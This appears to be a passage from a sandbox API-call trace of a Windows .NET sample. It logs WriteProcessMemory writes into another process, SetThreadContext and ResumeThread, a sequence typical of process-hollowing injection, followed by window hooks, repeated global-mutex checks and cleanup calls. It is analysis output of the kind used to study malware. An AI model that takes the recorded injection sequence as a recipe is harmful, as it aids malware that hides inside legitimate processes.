[0195.989] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x400000, lpBuffer=0x3a059c0*, nSize=0x200, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3a059c0*, lpNumberOfBytesWritten=0x19d298*=0x200) returned 1
[0196.006] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x402000, lpBuffer=0x3c786e0*, nSize=0x1c800, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3c786e0*, lpNumberOfBytesWritten=0x19d298*=0x1c800) returned 1
[0196.016] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x420000, lpBuffer=0x279ec90*, nSize=0x200, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x279ec90*, lpNumberOfBytesWritten=0x19d298*=0x200) returned 1
[0196.026] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x422000, lpBuffer=0x3c94f00*, nSize=0x15e00, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3c94f00*, lpNumberOfBytesWritten=0x19d298*=0x15e00) returned 1
[0196.042] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x386008, lpBuffer=0x279ee9c*, nSize=0x4, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x279ee9c*, lpNumberOfBytesWritten=0x19d298*=0x4) returned 1
[0196.051] SetThreadContext (hThread=0x458, lpContext=0x279e9b8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x386000, Edx=0x0, Ecx=0x0, Eax=0x41e792, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0196.056] ResumeThread (hThread=0x458) returned 0x1
[0196.384] CoGetContextToken (in: pToken=0x19de08 | out: pToken=0x19de08) returned 0x0
[0196.384] IUnknown:QueryInterface (in: This=0x6fbb40, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19de3c | out: ppvObject=0x19de3c*=0x6fbb4c) returned 0x0
[0196.384] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbb4c, pThreadType=0x19deac | out: pThreadType=0x19deac*=1) returned 0x0
[0196.384] IUnknown:Release (This=0x6fbb4c) returned 0x3
[0196.386] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x6d8398*=0x13c, lpdwindex=0x19dc74 | out: lpdwindex=0x19dc74) returned 0x0
Thread:
id = 2
os_tid = 0xef0
Thread:
id = 3
os_tid = 0x4e0
Thread:
id = 4
os_tid = 0x560
[0103.420] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0129.909] CloseHandle (hObject=0x37c) returned 1
[0129.909] GetLastError () returned 0x0
[0129.909] CloseHandle (hObject=0x368) returned 1
[0129.909] GetLastError () returned 0x0
[0129.910] CloseHandle (hObject=0x378) returned 1
[0129.910] GetLastError () returned 0x0
[0129.910] CloseHandle (hObject=0x384) returned 1
[0129.911] GetLastError () returned 0x0
[0129.911] CloseHandle (hObject=0x374) returned 1
[0129.911] GetLastError () returned 0x0
[0129.911] CloseHandle (hObject=0x380) returned 1
[0129.912] GetLastError () returned 0x0
[0129.912] CloseHandle (hObject=0x36c) returned 1
[0129.912] GetLastError () returned 0x0
[0129.913] CloseHandle (hObject=0x370) returned 1
[0129.913] GetLastError () returned 0x0
[0196.452] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=1999548128) returned 37554642
[0196.457] SetClassLongW (hWnd=0x8027e, nIndex=-24, dwNewLong=1999548128) returned 0x23d0892
[0196.460] PostMessageW (hWnd=0x8027e, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0196.471] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0196.475] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.378734a", hInstance=0x400000) returned 0
[0196.475] GetLastError () returned 0x584
[0196.526] DeleteAtom (nAtom=0xc000) returned 0x0
[0196.527] GetLastError () returned 0x584
[0196.527] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0196.527] GetLastError () returned 0x2
[0196.527] IsWindow (hWnd=0x50308) returned 1
[0196.528] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0196.530] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0196.532] SetWindowLongW (hWnd=0x50308, nIndex=-4, dwNewLong=1999548128) returned 37556226
[0196.533] SetClassLongW (hWnd=0x50308, nIndex=-24, dwNewLong=1999548128) returned 0x23d1002
[0196.533] IsWindow (hWnd=0x50308) returned 1
[0196.533] DestroyWindow (hWnd=0x50308) returned 0
[0196.534] PostMessageW (hWnd=0x50308, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0196.534] SetConsoleCtrlHandler (HandlerRoutine=0x23d0fca, Add=0) returned 1
[0196.566] GetLastError () returned 0x0
[0196.566] GetLastError () returned 0x0
[0196.566] LocalFree (hMem=0x76d048) returned 0x0
[0196.566] GetLastError () returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.585] LocalFree (hMem=0x76d1e0) returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.591] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a798c, cbSid=0x481f7f0 | out: pSid=0x27a798c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.591] GetLastError () returned 0x0
[0196.592] CreateMutexW (lpMutexAttributes=0x27a7a9c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.592] GetLastError () returned 0x0
[0196.592] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.592] GetLastError () returned 0x0
[0196.592] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.592] GetLastError () returned 0x0
[0196.592] CloseHandle (hObject=0x4ec) returned 1
[0196.592] GetLastError () returned 0x0
[0196.592] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a7c9c, cbSid=0x481f7f0 | out: pSid=0x27a7c9c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.592] GetLastError () returned 0x0
[0196.593] CreateMutexW (lpMutexAttributes=0x27a7dac, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.593] GetLastError () returned 0x0
[0196.593] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.593] GetLastError () returned 0x0
[0196.593] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.593] GetLastError () returned 0x0
[0196.593] CloseHandle (hObject=0x4ec) returned 1
[0196.593] GetLastError () returned 0x0
[0196.593] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a7fac, cbSid=0x481f7f0 | out: pSid=0x27a7fac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.593] GetLastError () returned 0x0
[0196.594] CreateMutexW (lpMutexAttributes=0x27a80bc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.594] GetLastError () returned 0x0
[0196.594] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.594] GetLastError () returned 0x0
[0196.594] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.594] GetLastError () returned 0x0
[0196.594] CloseHandle (hObject=0x4ec) returned 1
[0196.594] GetLastError () returned 0x0
[0196.594] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a82bc, cbSid=0x481f7f0 | out: pSid=0x27a82bc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.594] GetLastError () returned 0x0
[0196.595] CreateMutexW (lpMutexAttributes=0x27a83cc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.595] GetLastError () returned 0x0
[0196.595] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.595] GetLastError () returned 0x0
[0196.595] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.595] GetLastError () returned 0x0
[0196.595] CloseHandle (hObject=0x4ec) returned 1
[0196.595] GetLastError () returned 0x0
[0196.595] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a85cc, cbSid=0x481f7f0 | out: pSid=0x27a85cc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.595] GetLastError () returned 0x0
[0196.596] CreateMutexW (lpMutexAttributes=0x27a86dc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.596] GetLastError () returned 0x0
[0196.596] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.596] GetLastError () returned 0x0
[0196.596] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.596] GetLastError () returned 0x0
[0196.596] CloseHandle (hObject=0x4ec) returned 1
[0196.596] GetLastError () returned 0x0
[0196.596] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a88dc, cbSid=0x481f7f0 | out: pSid=0x27a88dc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.596] GetLastError () returned 0x0
[0196.597] CreateMutexW (lpMutexAttributes=0x27a89ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.597] GetLastError () returned 0x0
[0196.597] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.597] GetLastError () returned 0x0
[0196.597] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.597] GetLastError () returned 0x0
[0196.597] CloseHandle (hObject=0x4ec) returned 1
[0196.597] GetLastError () returned 0x0
[0196.598] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a8bec, cbSid=0x481f7f0 | out: pSid=0x27a8bec*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.598] GetLastError () returned 0x0
[0196.598] CreateMutexW (lpMutexAttributes=0x27a8cfc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.598] GetLastError () returned 0x0
[0196.598] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.598] GetLastError () returned 0x0
[0196.598] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.598] GetLastError () returned 0x0
[0196.599] CloseHandle (hObject=0x4ec) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a8efc, cbSid=0x481f7f0 | out: pSid=0x27a8efc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CreateMutexW (lpMutexAttributes=0x27a900c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.599] GetLastError () returned 0x0
[0196.599] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.599] GetLastError () returned 0x0
[0196.599] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CloseHandle (hObject=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a920c, cbSid=0x481f7f0 | out: pSid=0x27a920c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CreateMutexW (lpMutexAttributes=0x27a931c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.600] GetLastError () returned 0x0
[0196.600] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.600] GetLastError () returned 0x0
[0196.600] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CloseHandle (hObject=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.975] CloseHandle (hObject=0x284) returned 1
[0196.975] GetLastError () returned 0x0
[0196.999] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0196.999] GetLastError () returned 0x2
[0197.008] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.008] GetLastError () returned 0x2
[0197.065] RestoreDC (hdc=0x380106da, nSavedDC=-1) returned 1
[0197.065] GetLastError () returned 0x2
[0197.160] DeleteDC (hdc=0x380106da) returned 1
[0197.161] GetLastError () returned 0x2
[0197.161] DeleteObject (ho=0x780a0998) returned 1
[0197.161] GetLastError () returned 0x2
[0197.166] DeleteObject (ho=0x2a0a0693) returned 1
[0197.167] GetLastError () returned 0x2
[0197.167] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.167] GetLastError () returned 0x2
[0197.184] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.184] GetLastError () returned 0x2
[0197.185] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.185] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.186] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.186] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.203] DeleteObject (ho=0x350a09a6) returned 1
[0197.203] GetLastError () returned 0x2
[0197.203] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.203] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.211] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.211] GetLastError () returned 0x2
[0197.212] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.212] GetLastError () returned 0x2
[0197.233] DestroyCursor (hCursor=0x700fb) returned 1
[0197.237] CloseHandle (hObject=0x4d0) returned 1
[0197.237] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x384) returned 1
[0197.239] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x354) returned 1
[0197.239] GetLastError () returned 0x2
[0197.239] CloseHandle (hObject=0x380) returned 1
[0197.240] GetLastError () returned 0x2
[0197.240] _DllBidEntryPoint@36 () returned 0x1
[0197.240] _DllBidFinalize@0 () returned 0x0
[0197.240] RegCloseKey (hKey=0x80000004) returned 0x0
[0197.241] UnmapViewOfFile (lpBaseAddress=0x73b0000) returned 1
[0197.241] GetLastError () returned 0x2
[0197.242] CloseHandle (hObject=0x358) returned 1
[0197.242] GetLastError () returned 0x2
Thread:
id = 5
os_tid = 0x990
Thread:
id = 6
os_tid = 0x890
Thread:
id = 7
os_tid = 0xa3c
Thread:
id = 8
os_tid = 0xa28
Thread:
id = 9
os_tid = 0xed8
[0124.683] CoGetContextToken (in: pToken=0x77efde8 | out: pToken=0x77efde8) returned 0x0
[0124.684] IUnknown:QueryInterface (in: This=0x6fbbf8, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x77efe1c | out: ppvObject=0x77efe1c*=0x6fbc04) returned 0x0
[0124.685] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbc04, pThreadType=0x77efe50 | out: pThreadType=0x77efe50*=0) returned 0x0
[0124.685] IUnknown:Release (This=0x6fbc04) returned 0x0
[0124.685] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 10
os_tid = 0x1370
Thread:
id = 11
os_tid = 0x1290
Thread:
id = 12
os_tid = 0x12d0
Thread:
id = 107
os_tid = 0x9f4
